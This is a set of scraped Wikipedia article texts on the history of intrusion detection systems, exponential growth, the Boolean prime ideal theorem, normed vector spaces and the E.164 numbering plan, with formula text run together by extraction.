In 1986 theNational Security Agencystarted an IDS research transfer program underRebecca Bace. Bace later published the seminal text on the subject,Intrusion Detection, in 2000.[45]
Wisdom & Sense (W&S) was a statistics-based anomaly detector developed in 1989 at theLos Alamos National Laboratory.[46]W&S created rules based on statistical analysis, and then used those rules for anomaly detection.
In 1990, the Time-based Inductive Machine (TIM) did anomaly detection using inductive learning of sequential user patterns inCommon Lispon aVAX3500 computer.[47]The Network Security Monitor (NSM) performed masking on access matrices for anomaly detection on a Sun-3/50 workstation.[48]The Information Security Officer's Assistant (ISOA) was a 1990 prototype that considered a variety of strategies including statistics, a profile checker, and an expert system.[49]ComputerWatch atAT&T Bell Labsused statistics and rules for audit data reduction and intrusion detection.[50]
Then, in 1991, researchers at theUniversity of California, Daviscreated a prototype Distributed Intrusion Detection System (DIDS), which was also an expert system.[51]The Network Anomaly Detection and Intrusion Reporter (NADIR), also in 1991, was a prototype IDS developed at the Los Alamos National Laboratory's Integrated Computing Network (ICN), and was heavily influenced by the work of Denning and Lunt.[52]NADIR used a statistics-based anomaly detector and an expert system.
TheLawrence Berkeley National LaboratoryannouncedBroin 1998, which used its own rule language for packet analysis fromlibpcapdata.[53]Network Flight Recorder (NFR) in 1999 also used libpcap.[54]
APE was developed as a packet sniffer, also using libpcap, in November, 1998, and was renamedSnortone month later. Snort has since become the world's largest used IDS/IPS system with over 300,000 active users.[55]It can monitor both local systems, and remote capture points using theTZSPprotocol.
The Audit Data Analysis and Mining (ADAM) IDS in 2001 usedtcpdumpto build profiles of rules for classifications.[56]In 2003,Yongguang Zhangand Wenke Lee argue for the importance of IDS in networks with mobile nodes.[57]
In 2015, Viegas and his colleagues[58]proposed an anomaly-based intrusion detection engine, aiming System-on-Chip (SoC) for applications in Internet of Things (IoT), for instance. The proposal applies machine learning for anomaly detection, providing energy-efficiency to a Decision Tree, Naive-Bayes, and k-Nearest Neighbors classifiers implementation in an Atom CPU and its hardware-friendly implementation in a FPGA.[59][60]In the literature, this was the first work that implement each classifier equivalently in software and hardware and measures its energy consumption on both. Additionally, it was the first time that was measured the energy consumption for extracting each features used to make the network packet classification, implemented in software and hardware.[61]
This article incorporatespublic domain materialfromKaren Scarfone, Peter Mell.Guide to Intrusion Detection and Prevention Systems, SP800-94(PDF).National Institute of Standards and Technology. Retrieved1 January2010.
|
https://en.wikipedia.org/wiki/Intrusion_detection_system
|
Exponential growthoccurs when a quantity grows as anexponential functionof time. The quantity grows at a ratedirectly proportionalto its present size. For example, when it is 3 times as big as it is now, it will be growing 3 times as fast as it is now.
In more technical language, its instantaneousrate of change(that is, thederivative) of a quantity with respect to an independent variable isproportionalto the quantity itself. Often the independent variable is time. Described as afunction, a quantity undergoing exponential growth is anexponential functionof time, that is, the variable representing time is the exponent (in contrast to other types of growth, such asquadratic growth). Exponential growth isthe inverseoflogarithmic growth.
Not all cases of growth at an always increasing rate are instances of exponential growth. For example the functionf(x)=x3{\textstyle f(x)=x^{3}}grows at an ever increasing rate, but is much slower than growing exponentially. For example, whenx=1,{\textstyle x=1,}it grows at 3 times its size, but whenx=10{\textstyle x=10}it grows at 30% of its size. If an exponentially growing function grows at a rate that is 3 times is present size, then it always grows at a rate that is 3 times its present size. When it is 10 times as big as it is now, it will grow 10 times as fast.
If the constant of proportionality is negative, then the quantity decreases over time, and is said to be undergoingexponential decayinstead. In the case of a discretedomainof definition with equal intervals, it is also calledgeometric growthorgeometric decaysince the function values form ageometric progression.
The formula for exponential growth of a variablexat the growth rater, as timetgoes on in discrete intervals (that is, at integer times 0, 1, 2, 3, ...), is
xt=x0(1+r)t{\displaystyle x_{t}=x_{0}(1+r)^{t}}
wherex0is the value ofxat time 0. The growth of a bacterialcolonyis often used to illustrate it. One bacterium splits itself into two, each of which splits itself resulting in four, then eight, 16, 32, and so on. The amount of increase keeps increasing because it is proportional to the ever-increasing number of bacteria. Growth like this is observed in real-life activity or phenomena, such as the spread of virus infection, the growth of debt due tocompound interest, and the spread ofviral videos. In real cases, initial exponential growth often does not last forever, instead slowing down eventually due to upper limits caused by external factors and turning intologistic growth.
Terms like "exponential growth" are sometimes incorrectly interpreted as "rapid growth". Indeed, something that grows exponentially can in fact be growing slowly at first.[1][2]
A quantityxdepends exponentially on timetifx(t)=a⋅bt/τ{\displaystyle x(t)=a\cdot b^{t/\tau }}where the constantais the initial value ofx,x(0)=a,{\displaystyle x(0)=a\,,}the constantbis a positive growth factor, andτis thetime constant—the time required forxto increase by one factor ofb:x(t+τ)=a⋅b(t+τ)/τ=a⋅bt/τ⋅bτ/τ=x(t)⋅b.{\displaystyle x(t+\tau )=a\cdot b^{(t+\tau )/\tau }=a\cdot b^{t/\tau }\cdot b^{\tau /\tau }=x(t)\cdot b\,.}
Ifτ> 0andb> 1, thenxhas exponential growth. Ifτ< 0andb> 1, orτ> 0and0 <b< 1, thenxhasexponential decay.
Example:If a species of bacteria doubles every ten minutes, starting out with only one bacterium, how many bacteria would be present after one hour?The question impliesa= 1,b= 2andτ= 10 min.
x(t)=a⋅bt/τ=1⋅2t/(10min){\displaystyle x(t)=a\cdot b^{t/\tau }=1\cdot 2^{t/(10{\text{ min}})}}x(1hr)=1⋅2(60min)/(10min)=1⋅26=64.{\displaystyle x(1{\text{ hr}})=1\cdot 2^{(60{\text{ min}})/(10{\text{ min}})}=1\cdot 2^{6}=64.}
After one hour, or six ten-minute intervals, there would be sixty-four bacteria.
Many pairs(b,τ)of adimensionlessnon-negative numberband an amount of timeτ(aphysical quantitywhich can be expressed as the product of a number of units and a unit of time) represent the same growth rate, withτproportional tologb. For any fixedbnot equal to 1 (e.g.eor 2), the growth rate is given by the non-zero timeτ. For any non-zero timeτthe growth rate is given by the dimensionless positive numberb.
Thus the law of exponential growth can be written in different but mathematically equivalent forms, by using a differentbase. The most common forms are the following:x(t)=x0⋅ekt=x0⋅et/τ=x0⋅2t/T=x0⋅(1+r100)t/p,{\displaystyle x(t)=x_{0}\cdot e^{kt}=x_{0}\cdot e^{t/\tau }=x_{0}\cdot 2^{t/T}=x_{0}\cdot \left(1+{\frac {r}{100}}\right)^{t/p},}wherex0expresses the initial quantityx(0).
Parameters (negative in the case of exponential decay):
The quantitiesk,τ, andT, and for a givenpalsor, have a one-to-one connection given by the following equation (which can be derived by taking the natural logarithm of the above):k=1τ=ln2T=ln(1+r100)p{\displaystyle k={\frac {1}{\tau }}={\frac {\ln 2}{T}}={\frac {\ln \left(1+{\frac {r}{100}}\right)}{p}}}wherek= 0corresponds tor= 0and toτandTbeing infinite.
Ifpis the unit of time the quotientt/pis simply the number of units of time. Using the notationtfor the (dimensionless) number of units of time rather than the time itself,t/pcan be replaced byt, but for uniformity this has been avoided here. In this case the division bypin the last formula is not a numerical division either, but converts a dimensionless number to the correct quantity including unit.
A popular approximated method for calculating the doubling time from the growth rate is therule of 70,
that is,T≃70/r{\displaystyle T\simeq 70/r}.
If a variablexexhibits exponential growth according tox(t)=x0(1+r)t{\displaystyle x(t)=x_{0}(1+r)^{t}}, then the log (to any base) ofxgrows linearlyover time, as can be seen by takinglogarithmsof both sides of the exponential growth equation:logx(t)=logx0+t⋅log(1+r).{\displaystyle \log x(t)=\log x_{0}+t\cdot \log(1+r).}
This allows an exponentially growing variable to be modeled with alog-linear model. For example, if one wishes to empirically estimate the growth rate from intertemporal data onx, one canlinearly regresslogxont.
Theexponential functionx(t)=x0ekt{\displaystyle x(t)=x_{0}e^{kt}}satisfies thelinear differential equation:dxdt=kx{\displaystyle {\frac {dx}{dt}}=kx}saying that the change per instant of time ofxat timetis proportional to the value ofx(t), andx(t)has theinitial valuex(0)=x0{\displaystyle x(0)=x_{0}}.
The differential equation is solved by direct integration:dxdt=kxdxx=kdt∫x0x(t)dxx=k∫0tdtlnx(t)x0=kt.{\displaystyle {\begin{aligned}{\frac {dx}{dt}}&=kx\\[5pt]{\frac {dx}{x}}&=k\,dt\\[5pt]\int _{x_{0}}^{x(t)}{\frac {dx}{x}}&=k\int _{0}^{t}\,dt\\[5pt]\ln {\frac {x(t)}{x_{0}}}&=kt.\end{aligned}}}so thatx(t)=x0ekt.{\displaystyle x(t)=x_{0}e^{kt}.}
In the above differential equation, ifk< 0, then the quantity experiencesexponential decay.
For anonlinearvariation of this growth model seelogistic function.
In the long run, exponential growth of any kind will overtake linear growth of any kind (that is the basis of theMalthusian catastrophe) as well as anypolynomialgrowth, that is, for allα:limt→∞tαaet=0.{\displaystyle \lim _{t\to \infty }{\frac {t^{\alpha }}{ae^{t}}}=0.}
There is a whole hierarchy of conceivable growth rates that are slower than exponential and faster than linear (in the long run). SeeDegree of a polynomial § Computed from the function values.
Growth rates may also be faster than exponential. In the most extreme case, when growth increases without bound in finite time, it is calledhyperbolic growth. In between exponential and hyperbolic growth lie more classes of growth behavior, like thehyperoperationsbeginning attetration, andA(n,n){\displaystyle A(n,n)}, the diagonal of theAckermann function.
In reality, initial exponential growth is often not sustained forever. After some period, it will be slowed by external or environmental factors. For example, population growth may reach an upper limit due to resource limitations.[9]In 1845, the Belgian mathematicianPierre François Verhulstfirst proposed a mathematical model of growth like this, called the "logistic growth".[10]
Exponential growth models of physical phenomena only apply within limited regions, as unbounded growth is not physically realistic. Although growth may initially be exponential, the modelled phenomena will eventually enter a region in which previously ignorednegative feedbackfactors become significant (leading to alogistic growthmodel) or other underlying assumptions of the exponential growth model, such as continuity or instantaneous feedback, break down.
Studies show that human beings have difficulty understanding exponential growth. Exponential growth bias is the tendency to underestimate compound growth processes. This bias can have financial implications as well.[11]
According to legend, vizier Sissa Ben Dahir presented an Indian King Sharim with a beautiful handmadechessboard. The king asked what he would like in return for his gift and the courtier surprised the king by asking for one grain of rice on the first square, two grains on the second, four grains on the third, and so on. The king readily agreed and asked for the rice to be brought. All went well at first, but the requirement for2n−1grains on thenth square demanded over a million grains on the 21st square, more than a million million (a.k.a.trillion) on the 41st and there simply was not enough rice in the whole world for the final squares. (From Swirski, 2006)[12]
The "second half of the chessboard" refers to the time when an exponentially growing influence is having a significant economic impact on an organization's overall business strategy.
French children are offered a riddle, which appears to be an aspect of exponential growth: "the apparent suddenness with which an exponentially growing quantity approaches a fixed limit". The riddle imagines a water lily plant growing in a pond. The plant doubles in size every day and, if left alone, it would smother the pond in 30 days killing all the other living things in the water. Day after day, the plant's growth is small, so it is decided that it won't be a concern until it covers half of the pond. Which day will that be? The 29th day, leaving only one day to save the pond.[13][12]
|
https://en.wikipedia.org/wiki/Exponential_growth
|
Inmathematics, theBoolean prime ideal theoremstates thatidealsin aBoolean algebracan be extended toprime ideals. A variation of this statement forfilters on setsis known as theultrafilter lemma. Other theorems are obtained by considering different mathematical structures with appropriate notions of ideals, for example,ringsand prime ideals (of ring theory), ordistributive latticesandmaximalideals (oforder theory). This article focuses on prime ideal theorems from order theory.
Although the various prime ideal theorems may appear simple and intuitive, they cannot be deduced in general from the axioms ofZermelo–Fraenkel set theorywithout the axiom of choice (abbreviated ZF). Instead, some of the statements turn out to be equivalent to theaxiom of choice(AC), while others—the Boolean prime ideal theorem, for instance—represent a property that is strictly weaker than AC. It is due to this intermediate status between ZF and ZF + AC (ZFC) that the Boolean prime ideal theorem is often taken as an axiom of set theory. The abbreviations BPI or PIT (for Boolean algebras) are sometimes used to refer to this additional axiom.
Anorder idealis a (non-empty)directedlower set. If the consideredpartially ordered set(poset) has binarysuprema(a.k.a.joins), as do the posets within this article, then this is equivalently characterized as a non-empty lower setIthat is closed for binary suprema (that is,x,y∈I{\displaystyle x,y\in I}impliesx∨y∈I{\displaystyle x\vee y\in I}). An idealIis prime if its set-theoretic complement in the poset is afilter(that is,x∧y∈I{\displaystyle x\wedge y\in I}impliesx∈I{\displaystyle x\in I}ory∈I{\displaystyle y\in I}). Ideals are proper if they are not equal to the whole poset.
Historically, the first statement relating to later prime ideal theorems was in fact referring to filters—subsets that are ideals with respect to thedualorder. The ultrafilter lemma states that every filter on a set is contained within some maximal (proper) filter—anultrafilter. Recall that filters on sets are proper filters of the Boolean algebra of itspowerset. In this special case, maximal filters (i.e. filters that are not strict subsets of any proper filter) and prime filters (i.e. filters that with each union of subsetsXandYcontain alsoXorY) coincide. The dual of this statement thus assures that every ideal of a powerset is contained in a prime ideal.
The above statement led to various generalized prime ideal theorems, each of which exists in a weak and in a strong form.Weak prime ideal theoremsstate that everynon-trivialalgebra of a certain class has at least one prime ideal. In contrast,strong prime ideal theoremsrequire that every ideal that is disjoint from a given filter can be extended to a prime ideal that is still disjoint from that filter. In the case of algebras that are not posets, one uses different substructures instead of filters. Many forms of these theorems are actually known to be equivalent, so that the assertion that "PIT" holds is usually taken as the assertion that the corresponding statement for Boolean algebras (BPI) is valid.
Another variation of similar theorems is obtained by replacing each occurrence ofprime idealbymaximal ideal. The corresponding maximal ideal theorems (MIT) are often—though not always—stronger than their PIT equivalents.
The Boolean prime ideal theorem is the strong prime ideal theorem for Boolean algebras. Thus the formal statement is:
The weak prime ideal theorem for Boolean algebras simply states:
We refer to these statements as the weak and strongBPI. The two are equivalent, as the strong BPI clearly implies the weak BPI, and the reverse implication can be achieved by using the weak BPI to find prime ideals in the appropriate quotient algebra.
The BPI can be expressed in various ways. For this purpose, recall the following theorem:
For any idealIof a Boolean algebraB, the following are equivalent:
This theorem is a well-known fact for Boolean algebras. Its dual establishes the equivalence of prime filters and ultrafilters. Note that the last property is in fact self-dual—only the prior assumption thatIis an ideal gives the full characterization. All of the implications within this theorem can be proven in ZF.
Thus the following (strong) maximal ideal theorem (MIT) for Boolean algebras is equivalent to BPI:
Note that one requires "global" maximality, not just maximality with respect to being disjoint fromF. Yet, this variation yields another equivalent characterization of BPI:
The fact that this statement is equivalent to BPI is easily established by noting the following theorem: For anydistributive latticeL, if an idealIis maximal among all ideals ofLthat are disjoint to a given filterF, thenIis a prime ideal. The proof for this statement (which can again be carried out in ZF set theory) is included in the article on ideals. Since any Boolean algebra is a distributive lattice, this shows the desired implication.
All of the above statements are now easily seen to be equivalent. Going even further, one can exploit the fact the dual orders of Boolean algebras are exactly the Boolean algebras themselves. Hence, when taking the equivalent duals of all former statements, one ends up with a number of theorems that equally apply to Boolean algebras, but where every occurrence ofidealis replaced byfilter[citation needed]. It is worth noting that for the special case where the Boolean algebra under consideration is apowersetwith thesubsetordering, the "maximal filter theorem" is called the ultrafilter lemma.
Summing up, for Boolean algebras, the weak and strong MIT, the weak and strong PIT, and these statements with filters in place of ideals are all equivalent. It is known that all of these statements are consequences of theAxiom of Choice,AC, (the easy proof makes use ofZorn's lemma), but cannot be proven inZF(Zermelo-Fraenkel set theory withoutAC), if ZF isconsistent. Yet, the BPI is strictly weaker than the axiom of choice, though the proof of this statement, due to J. D. Halpern andAzriel Lévyis rather non-trivial.
The prototypical properties that were discussed for Boolean algebras in the above section can easily be modified to include more generallattices, such asdistributive latticesorHeyting algebras. However, in these cases maximal ideals are different from prime ideals, and the relation between PITs and MITs is not obvious.
Indeed, it turns out that the MITs for distributive lattices and even for Heyting algebras are equivalent to the axiom of choice. On the other hand, it is known that the strong PIT for distributive lattices is equivalent to BPI (i.e. to the MIT and PIT for Boolean algebras). Hence this statement is strictly weaker than the axiom of choice. Furthermore, observe that Heyting algebras are not self dual, and thus using filters in place of ideals yields different theorems in this setting. Maybe surprisingly, the MIT for the duals of Heyting algebras is not stronger than BPI, which is in sharp contrast to the abovementioned MIT for Heyting algebras.
Finally, prime ideal theorems do also exist for other (not order-theoretical) abstract algebras. For example, the MIT for rings implies the axiom of choice. This situation requires to replace the order-theoretic term "filter" by other concepts—for rings a "multiplicatively closed subset" is appropriate.
A filter on a setXis a nonempty collection of nonempty subsets ofXthat is closed under finite intersection and under superset. An ultrafilter is a maximal filter.
The ultrafilter lemma states that every filter on a setXis a subset of someultrafilteronX.[1]An ultrafilter that does not contain finite sets is called "non-principal". The ultrafilter lemma, and in particular the existence of non-principal ultrafilters (consider the filter of all sets with finite complements), can be proven fromZorn's lemma.
The ultrafilter lemma is equivalent to the Boolean prime ideal theorem, with the equivalence provable in ZF set theory without the axiom of choice. The idea behind the proof is that the subsets of any set form a Boolean algebra partially ordered by inclusion, and any Boolean algebra is representable as an algebra of sets byStone's representation theorem.
If the setXis finite then the ultrafilter lemma can be proven from the axioms ZF. This is no longer true for infinite sets; an additional axiommustbe assumed.Zorn's lemma, theaxiom of choice, andTychonoff's theoremcan all be used to prove the ultrafilter lemma. The ultrafilter lemma is strictly weaker than the axiom of choice.
The ultrafilter lemma has manyapplications in topology. The ultrafilter lemma can be used to prove theHahn-Banach theoremand theAlexander subbase theorem.
Intuitively, the Boolean prime ideal theorem states that there are "enough" prime ideals in a Boolean algebra in the sense that we can extendeveryideal to a maximal one. This is of practical importance for provingStone's representation theorem for Boolean algebras, a special case ofStone duality, in which one equips the set of all prime ideals with a certain topology and can indeed regain the original Boolean algebra (up toisomorphism) from this data. Furthermore, it turns out that in applications one can freely choose either to work with prime ideals or with prime filters, because every ideal uniquely determines a filter: the set of all Boolean complements of its elements. Both approaches are found in the literature.
Many other theorems of general topology that are often said to rely on the axiom of choice are in fact equivalent to BPI. For example, the theorem that a product of compactHausdorff spacesis compact is equivalent to it. If we leave out "Hausdorff" we get atheoremequivalent to the full axiom of choice.
Ingraph theory, thede Bruijn–Erdős theoremis another equivalent to BPI. It states that, if a given infinite graph requires at least some finite numberkin anygraph coloring, then it has a finite subgraph that also requiresk.[2]
A not too well known application of the Boolean prime ideal theorem is the existence of anon-measurable set[3](the example usually given is theVitali set, which requires the axiom of choice). From this and the fact that the BPI is strictly weaker than the axiom of choice, it follows that the existence of non-measurable sets is strictly weaker than the axiom of choice.
In linear algebra, the Boolean prime ideal theorem can be used to prove that any twobasesof a givenvector spacehave the samecardinality.
|
https://en.wikipedia.org/wiki/Boolean_prime_ideal_theorem
|
Inmathematics, anormed vector spaceornormed spaceis avector spaceover therealorcomplexnumbers on which anormis defined.[1]A norm is a generalization of the intuitive notion of "length" in the physical world. IfV{\displaystyle V}is a vector space overK{\displaystyle K}, whereK{\displaystyle K}is a field equal toR{\displaystyle \mathbb {R} }or toC{\displaystyle \mathbb {C} }, then a norm onV{\displaystyle V}is a mapV→R{\displaystyle V\to \mathbb {R} }, typically denoted by‖⋅‖{\displaystyle \lVert \cdot \rVert }, satisfying the following four axioms:
IfV{\displaystyle V}is a real or complex vector space as above, and‖⋅‖{\displaystyle \lVert \cdot \rVert }is a norm onV{\displaystyle V}, then the ordered pair(V,‖⋅‖){\displaystyle (V,\lVert \cdot \rVert )}is called a normed vector space. If it is clear from context which norm is intended, then it is common to denote the normed vector space simply byV{\displaystyle V}.
A norm induces adistance, called its(norm) induced metric, by the formulad(x,y)=‖y−x‖.{\displaystyle d(x,y)=\|y-x\|.}which makes any normed vector space into ametric spaceand atopological vector space. If this metric space iscompletethen the normed space is aBanach space. Every normed vector space can be "uniquely extended" to a Banach space, which makes normed spaces intimately related to Banach spaces. Every Banach space is a normed space but converse is not true. For example, the set of thefinite sequencesof real numbers can be normed with theEuclidean norm, but it is not complete for this norm.
Aninner product spaceis a normed vector space whose norm is the square root of the inner product of a vector and itself. TheEuclidean normof aEuclidean vector spaceis a special case that allows definingEuclidean distanceby the formulad(A,B)=‖AB→‖.{\displaystyle d(A,B)=\|{\overrightarrow {AB}}\|.}
The study of normed spaces and Banach spaces is a fundamental part offunctional analysis, a major subfield of mathematics.
Anormed vector spaceis avector spaceequipped with anorm. Aseminormed vector spaceis a vector space equipped with aseminorm.
A usefulvariation of the triangle inequalityis‖x−y‖≥|‖x‖−‖y‖|{\displaystyle \|x-y\|\geq |\|x\|-\|y\||}for any vectorsx{\displaystyle x}andy.{\displaystyle y.}
This also shows that a vector norm is a (uniformly)continuous function.
Property 3 depends on a choice of norm|α|{\displaystyle |\alpha |}on the field of scalars. When the scalar field isR{\displaystyle \mathbb {R} }(or more generally a subset ofC{\displaystyle \mathbb {C} }), this is usually taken to be the ordinaryabsolute value, but other choices are possible. For example, for a vector space overQ{\displaystyle \mathbb {Q} }one could take|α|{\displaystyle |\alpha |}to be thep{\displaystyle p}-adic absolute value.
If(V,‖⋅‖){\displaystyle (V,\|\,\cdot \,\|)}is a normed vector space, the norm‖⋅‖{\displaystyle \|\,\cdot \,\|}induces ametric(a notion ofdistance) and therefore atopologyonV.{\displaystyle V.}This metric is defined in the natural way: the distance between two vectorsu{\displaystyle \mathbf {u} }andv{\displaystyle \mathbf {v} }is given by‖u−v‖.{\displaystyle \|\mathbf {u} -\mathbf {v} \|.}This topology is precisely the weakest topology which makes‖⋅‖{\displaystyle \|\,\cdot \,\|}continuous and which is compatible with the linear structure ofV{\displaystyle V}in the following sense:
Similarly, for any seminormed vector space we can define the distance between two vectorsu{\displaystyle \mathbf {u} }andv{\displaystyle \mathbf {v} }as‖u−v‖.{\displaystyle \|\mathbf {u} -\mathbf {v} \|.}This turns the seminormed space into apseudometric space(notice this is weaker than a metric) and allows the definition of notions such ascontinuityandconvergence.
To put it more abstractly every seminormed vector space is atopological vector spaceand thus carries atopological structurewhich is induced by the semi-norm.
Of special interest arecompletenormed spaces, which are known asBanach spaces.
Every normed vector spaceV{\displaystyle V}sits as a dense subspace inside some Banach space; this Banach space is essentially uniquely defined byV{\displaystyle V}and is called thecompletionofV.{\displaystyle V.}
Two norms on the same vector space are calledequivalentif they define the sametopology. On a finite-dimensional vector space (but not infinite-dimensional vector spaces), all norms are equivalent (although the resulting metric spaces need not be the same)[2]And since any Euclidean space is complete, we can thus conclude that all finite-dimensional normed vector spaces are Banach spaces.
A normed vector spaceV{\displaystyle V}islocally compactif and only if the unit ballB={x:‖x‖≤1}{\displaystyle B=\{x:\|x\|\leq 1\}}iscompact, which is the case if and only ifV{\displaystyle V}is finite-dimensional; this is a consequence ofRiesz's lemma. (In fact, a more general result is true: a topological vector space is locally compact if and only if it is finite-dimensional. The point here is that we don't assume the topology comes from a norm.)
The topology of a seminormed vector space has many nice properties. Given aneighbourhood systemN(0){\displaystyle {\mathcal {N}}(0)}around 0 we can construct all other neighbourhood systems asN(x)=x+N(0):={x+N:N∈N(0)}{\displaystyle {\mathcal {N}}(x)=x+{\mathcal {N}}(0):=\{x+N:N\in {\mathcal {N}}(0)\}}withx+N:={x+n:n∈N}.{\displaystyle x+N:=\{x+n:n\in N\}.}
Moreover, there exists aneighbourhood basisfor the origin consisting ofabsorbingandconvex sets. As this property is very useful infunctional analysis, generalizations of normed vector spaces with this property are studied under the namelocally convex spaces.
A norm (orseminorm)‖⋅‖{\displaystyle \|\cdot \|}on a topological vector space(X,τ){\displaystyle (X,\tau )}is continuous if and only if the topologyτ‖⋅‖{\displaystyle \tau _{\|\cdot \|}}that‖⋅‖{\displaystyle \|\cdot \|}induces onX{\displaystyle X}iscoarserthanτ{\displaystyle \tau }(meaning,τ‖⋅‖⊆τ{\displaystyle \tau _{\|\cdot \|}\subseteq \tau }), which happens if and only if there exists some open ballB{\displaystyle B}in(X,‖⋅‖){\displaystyle (X,\|\cdot \|)}(such as maybe{x∈X:‖x‖<1}{\displaystyle \{x\in X:\|x\|<1\}}for example) that is open in(X,τ){\displaystyle (X,\tau )}(said different, such thatB∈τ{\displaystyle B\in \tau }).
Atopological vector space(X,τ){\displaystyle (X,\tau )}is callednormableif there exists a norm‖⋅‖{\displaystyle \|\cdot \|}onX{\displaystyle X}such that the canonical metric(x,y)↦‖y−x‖{\displaystyle (x,y)\mapsto \|y-x\|}induces the topologyτ{\displaystyle \tau }onX.{\displaystyle X.}The following theorem is due toKolmogorov:[3]
Kolmogorov's normability criterion: A Hausdorff topological vector space is normable if and only if there exists a convex,von Neumann boundedneighborhood of0∈X.{\displaystyle 0\in X.}
A product of a family of normable spaces is normable if and only if only finitely many of the spaces are non-trivial (that is,≠{0}{\displaystyle \neq \{0\}}).[3]Furthermore, the quotient of a normable spaceX{\displaystyle X}by a closed vector subspaceC{\displaystyle C}is normable, and if in additionX{\displaystyle X}'s topology is given by a norm‖⋅,‖{\displaystyle \|\,\cdot ,\|}then the mapX/C→R{\displaystyle X/C\to \mathbb {R} }given byx+C↦infc∈C‖x+c‖{\textstyle x+C\mapsto \inf _{c\in C}\|x+c\|}is a well defined norm onX/C{\displaystyle X/C}that induces thequotient topologyonX/C.{\displaystyle X/C.}[4]
IfX{\displaystyle X}is a Hausdorfflocally convextopological vector spacethen the following are equivalent:
Furthermore,X{\displaystyle X}is finite-dimensional if and only ifXσ′{\displaystyle X_{\sigma }^{\prime }}is normable (hereXσ′{\displaystyle X_{\sigma }^{\prime }}denotesX′{\displaystyle X^{\prime }}endowed with theweak-* topology).
The topologyτ{\displaystyle \tau }of theFréchet spaceC∞(K),{\displaystyle C^{\infty }(K),}as defined in the article onspaces of test functions and distributions, is defined by a countable family of norms but it isnota normable space because there does not exist any norm‖⋅‖{\displaystyle \|\cdot \|}onC∞(K){\displaystyle C^{\infty }(K)}such that the topology that this norm induces is equal toτ.{\displaystyle \tau .}
Even if a metrizable topological vector space has a topology that is defined by a family of norms, then it may nevertheless still fail to benormable space(meaning that its topology can not be defined by anysinglenorm).
An example of such a space is theFréchet spaceC∞(K),{\displaystyle C^{\infty }(K),}whose definition can be found in the article onspaces of test functions and distributions, because its topologyτ{\displaystyle \tau }is defined by a countable family of norms but it isnota normable space because there does not exist any norm‖⋅‖{\displaystyle \|\cdot \|}onC∞(K){\displaystyle C^{\infty }(K)}such that the topology this norm induces is equal toτ.{\displaystyle \tau .}In fact, the topology of alocally convex spaceX{\displaystyle X}can be a defined by a family ofnormsonX{\displaystyle X}if and only if there existsat least onecontinuous norm onX.{\displaystyle X.}[6]
The most important maps between two normed vector spaces are thecontinuouslinear maps. Together with these maps, normed vector spaces form acategory.
The norm is a continuous function on its vector space. All linear maps between finite-dimensional vector spaces are also continuous.
Anisometrybetween two normed vector spaces is a linear mapf{\displaystyle f}which preserves the norm (meaning‖f(v)‖=‖v‖{\displaystyle \|f(\mathbf {v} )\|=\|\mathbf {v} \|}for all vectorsv{\displaystyle \mathbf {v} }). Isometries are always continuous andinjective. Asurjectiveisometry between the normed vector spacesV{\displaystyle V}andW{\displaystyle W}is called anisometric isomorphism, andV{\displaystyle V}andW{\displaystyle W}are calledisometrically isomorphic. Isometrically isomorphic normed vector spaces are identical for all practical purposes.
When speaking of normed vector spaces, we augment the notion ofdual spaceto take the norm into account. The dualV′{\displaystyle V^{\prime }}of a normed vector spaceV{\displaystyle V}is the space of allcontinuouslinear maps fromV{\displaystyle V}to the base field (the complexes or the reals) — such linear maps are called "functionals". The norm of a functionalφ{\displaystyle \varphi }is defined as thesupremumof|φ(v)|{\displaystyle |\varphi (\mathbf {v} )|}wherev{\displaystyle \mathbf {v} }ranges over all unit vectors (that is, vectors of norm1{\displaystyle 1}) inV.{\displaystyle V.}This turnsV′{\displaystyle V^{\prime }}into a normed vector space. An important theorem about continuous linear functionals on normed vector spaces is theHahn–Banach theorem.
The definition of many normed spaces (in particular,Banach spaces) involves a seminorm defined on a vector space and then the normed space is defined as thequotient spaceby the subspace of elements of seminorm zero. For instance, with theLp{\displaystyle L^{p}}spaces, the function defined by‖f‖p=(∫|f(x)|pdx)1/p{\displaystyle \|f\|_{p}=\left(\int |f(x)|^{p}\;dx\right)^{1/p}}is a seminorm on the vector space of all functions on which theLebesgue integralon the right hand side is defined and finite. However, the seminorm is equal to zero for any functionsupportedon a set ofLebesgue measurezero. These functions form a subspace which we "quotient out", making them equivalent to the zero function.
Givenn{\displaystyle n}seminormed spaces(Xi,qi){\displaystyle \left(X_{i},q_{i}\right)}with seminormsqi:Xi→R,{\displaystyle q_{i}:X_{i}\to \mathbb {R} ,}denote theproduct spacebyX:=∏i=1nXi{\displaystyle X:=\prod _{i=1}^{n}X_{i}}where vector addition defined as(x1,…,xn)+(y1,…,yn):=(x1+y1,…,xn+yn){\displaystyle \left(x_{1},\ldots ,x_{n}\right)+\left(y_{1},\ldots ,y_{n}\right):=\left(x_{1}+y_{1},\ldots ,x_{n}+y_{n}\right)}and scalar multiplication defined asα(x1,…,xn):=(αx1,…,αxn).{\displaystyle \alpha \left(x_{1},\ldots ,x_{n}\right):=\left(\alpha x_{1},\ldots ,\alpha x_{n}\right).}
Define a new functionq:X→R{\displaystyle q:X\to \mathbb {R} }byq(x1,…,xn):=∑i=1nqi(xi),{\displaystyle q\left(x_{1},\ldots ,x_{n}\right):=\sum _{i=1}^{n}q_{i}\left(x_{i}\right),}which is a seminorm onX.{\displaystyle X.}The functionq{\displaystyle q}is a norm if and only if allqi{\displaystyle q_{i}}are norms.
More generally, for each realp≥1{\displaystyle p\geq 1}the mapq:X→R{\displaystyle q:X\to \mathbb {R} }defined byq(x1,…,xn):=(∑i=1nqi(xi)p)1p{\displaystyle q\left(x_{1},\ldots ,x_{n}\right):=\left(\sum _{i=1}^{n}q_{i}\left(x_{i}\right)^{p}\right)^{\frac {1}{p}}}is a semi norm.
For eachp{\displaystyle p}this defines the same topological space.
A straightforward argument involving elementary linear algebra shows that the only finite-dimensional seminormed spaces are those arising as the product space of a normed space and a space with trivial seminorm. Consequently, many of the more interesting examples and applications of seminormed spaces occur for infinite-dimensional vector spaces.
|
https://en.wikipedia.org/wiki/Normed_space
|
E.164is aninternational standard(ITU-TRecommendation), titledThe international public telecommunication numbering plan, that defines anumbering planfor the worldwidepublic switched telephone network(PSTN) and some other datanetworks.
E.164 defines a general format for internationaltelephone numbers. Plan-conforming telephone numbers are limited to only digits and to a maximum of fifteen digits.[1]The specification divides the digit string into a country code of one to three digits, and the subscriber telephone number of a maximum of twelve digits.
